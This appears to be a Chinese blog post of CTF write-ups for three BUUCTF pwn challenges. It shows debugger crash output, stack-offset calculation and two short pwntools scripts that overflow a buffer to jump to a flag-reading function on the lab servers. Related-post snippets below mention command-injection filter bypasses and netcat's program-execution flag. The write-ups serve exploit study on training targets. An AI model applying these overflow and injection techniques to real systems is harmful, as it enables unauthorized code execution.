pwn——test_your_nc#rip#warmup_csaw_2016

最新推荐文章于 2024-01-31 21:33:25 发布
最新推荐文章于 2024-01-31 21:33:25 发布
阅读量318 收藏
点赞数
分类专栏: CTF 文章标签: bash 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/120949369
版权

文章目录

test_your_nc

题目

https://buuoj.cn/challenges#test_your_nc

解答

1、根据题目提示,直接nc
在这里插入图片描述
2、cat flag
在这里插入图片描述

rip

题目

题目链接:https://buuoj.cn/challenges#rip

解答

1、IDA打开分析
在这里插入图片描述
发现gets函数,同时查询文件返现没有栈溢出保护
同时发现命令执行函数,地址为0x40118A
在这里插入图片描述

2、测试偏移地址
两种方法:
法一:

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/dililearngent/Desktop/pwn/pwn1 
please input
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
ok,bye!!!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7b043c0 (<__write_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd3780 --> 0x0 
RSI: 0x405010 ("ok,bye!!!\nAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RDI: 0x1 
RBP: 0x412d41414341416e ('nAACAA-A')
RSP: 0x7fffffffdce8 ("A(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RIP: 0x401185 (<main+67>:	ret)
R8 : 0x7ffff7fdf700 (0x00007ffff7fdf700)
R9 : 0x4177414159414176 ('vAAYAAwA')
R10: 0x7941417841415a41 ('AZAAxAAy')
R11: 0x246 
R12: 0x401060 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffddc0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40117a <main+56>:	call   0x401030 <puts@plt>
   0x40117f <main+61>:	mov    eax,0x0
   0x401184 <main+66>:	leave  
=> 0x401185 <main+67>:	ret    
   0x401186 <fun>:	push   rbp
   0x401187 <fun+1>:	mov    rbp,rsp
   0x40118a <fun+4>:	lea    rdi,[rip+0xe8a]        # 0x40201b
   0x401191 <fun+11>:	call   0x401040 <system@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdce8 ("A(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0x7fffffffdcf0 ("AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0x7fffffffdcf8 ("aAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0x7fffffffdd00 ("AbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0032| 0x7fffffffdd08 ("AAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0040| 0x7fffffffdd10 ("HAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0048| 0x7fffffffdd18 ("AIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0056| 0x7fffffffdd20 ("AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000401185 in main ()
gdb-peda$ pattern offset A(AADAA
A(AADAA found at offset: 23

得到偏移地址是23
法2:
手动计算
在这里插入图片描述
s的空间地址为15,加上堆栈中ebp,故返回地址存储空间的偏移地址是15+8=23

3、编写脚本

from pwn import *
p = remote('node4.buuoj.cn',25402)
payload = 'a'*23+p64(0x40118A)
p.sendline(payload)
p.interactive()

在这里插入图片描述
拿到flag

warmup_csaw_2016

题目

https://buuoj.cn/challenges#warmup_csaw_2016

解答

1、先查看文件信息
在这里插入图片描述
64位,小端序等
在这里插入图片描述
没有栈溢出保护
2、打开IDA分析一波,找到main函数,发现了很明显的sprintf栈溢出漏洞
在这里插入图片描述
shift+F12查看程序中的字符串:
在这里插入图片描述
定位相关函数,可以直接读取flag
在这里插入图片描述
在这里插入图片描述
3、测试偏移地址
![在这里插入图片描述](https://img-blog.csdnimg.cn/1ec43cef2aef49058c8bb5679c0bd73e.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBARGlsaUxlYXJuZ2VudA==,size_19,color_FFFFFF,t_70,g_se,x_1
在这里插入图片描述
由于程序返回地址被覆盖,未能正确返回故报错,此时栈顶元素或者ESP中的值所在的地址就是之前存储返回地址的地址,故只需要查看栈顶元素或ESP的值在输入值的偏移地址即可查找到我们所需要的偏移地址。
或者还可以这样考虑,在调用函数后,先压入函数返回地址再压入EBP的值,这里可以根据查看EBP里的值距离输入字符串的偏移值,然后再加上8即可得到偏移值
4、读取flag命令的函数地址为0x40060d,编写脚本

from pwn import *
p = remote('node4.buuoj.cn',28917)
payload = 'a'*72+p64(0x40060d)
p.sendline(payload)
p.interactive()

5、运行
在这里插入图片描述
得到flag

DiliLearngent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 391
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
Pwn | CTF】BUUCTF test_your_nc1
最新发布
weixin_46301214的博客
01-31 650
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
test_your_nc1 PWN
Rrolin的博客
11-13 455
通过在网上寻找博客得知,文件是提供了一份程序代码,其中红色部分表示出,该程序没有任何的保护手段,所以可以直接得。题目给了一个地址一个文件,这里我尝试去连接。结果直接就得到了flag!但是给的文件总归是要有用的。
test_your_nc
lwhaaaa的博客
10-08 2106
进入后: 根据题目,尝试在 Ubuntu 使用 NC 来连接监听端口 27051 端口 27051 被监听后实际就运行了一个程序,我们可以利用这个程序来进行一些操作。 使用 ls 查看有哪些内容,并很明显的发现了 flag 的存在 使用 linux 的命令 cat 查看即可得到 flag 复制即可完成 ...
[BUUCTF-pwn]——test_your_nc
Y_peak的博客
01-30 1106
BUUCTF——test_your_nc 题目地址:https://buuoj.cn/challenges 题目: 下载题目看看,在Linux上用,checksec test检查发现是64位的程序,并且没有开启canary。 在window上用IDA,反汇编看下源码。 啊这,啊这。打扰了,根本不需要做任何操作人家直接给你了,呜呜呜~~~。 所以wp也就很简单了 # test.py from pwn import * p = remote("ip地址",ip端口) #看看给你的服务端口是什么 p.int
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
【CTF_BUUctf】test_your_nc 1 Ubuntu 18
十二_的博客
10-22 1318
其实,我觉得那个test文件在这是不太重要的。
BUUCTF PWN test_your_nc
Ethan552525的博客
08-09 983
题目: 解题: 1:用IDA打开test 用file命令查看文件test为64位。 用IDA pro (64-bit)打开: 2:用netcat连接 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。 ...
warmup_csaw_2016
z1r0的博客
12-03 193
warmup_csaw_2016 查看保护 什么保护都没有开
nc + rip
weixin_51298357的博客
01-30 194
nc + rip buu上的前两道两个比较简单,所以wp就合成一篇 nc 看伪代码的时候就会发现什么都没有直接就是(/bin/sh),这里的sh就是之前所说的shell,/bin/sh告诉系统执行本文件的程序,平时写题的时候我们的目的是为了让程序跳转到这里例如buu上的jarvisoj_level0,这道题只要连接上就行。 这道题主要是想说nc命令。 nc是netcat的简写,主要作用: 1.实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 2.端口的扫描,nc可
[BUUCTF]PWN------test_your_nc
BangSen1的博客
01-12 233
test_your_nc 根据题目提示,nc一下靶场,接上ls直接看到flag cat flag 得到结果
20210913_test_your_nc
m0_51187558的博客
09-13 2942
20210913_test_your_nc 每日一题的第一周,来一起做一道究极入门的pwn题吧。 首先按照网址链接打开题。 题目叫做test your nc,也就是“测试你的nc”。 这看起来像是一个提示–很多ctf题都会把考察的方向作为题目的文件名,以给予做题者一个思路或者学习的方向。但是nc又是什么呢? 我们先把题目文件下载下来,看看具体的东西吧。 从文件管理中我们可以发现我们下载下来的题目叫做test,并且没有任何后缀。 回忆一下,windows系统里是不是几乎所有你看到可以执行的软件的后缀都是e
Buuctf Http
Dexret的博客
12-07 2279
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
BUUOJ-[GXYCTF2019]-WEB-WP
会下雪的晴天
09-13 948
平台地址:https://buuoj.cn/ 目录Ping Ping PingBabySQli禁止套娃 Ping Ping Ping 知识点:RCE,空格及过滤的一些基本绕过 提示GET ip,应该是RCE了,ls看看有啥 尝试cat一下,发现过滤了空格,绕过一下,过滤了flag,哈哈看来不是这么简单啊,读一下源码吧 空格绕过可以用这些字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1 等 试了试好像只有$I.
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1866
[RoarCTF 2019]Easy Java
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值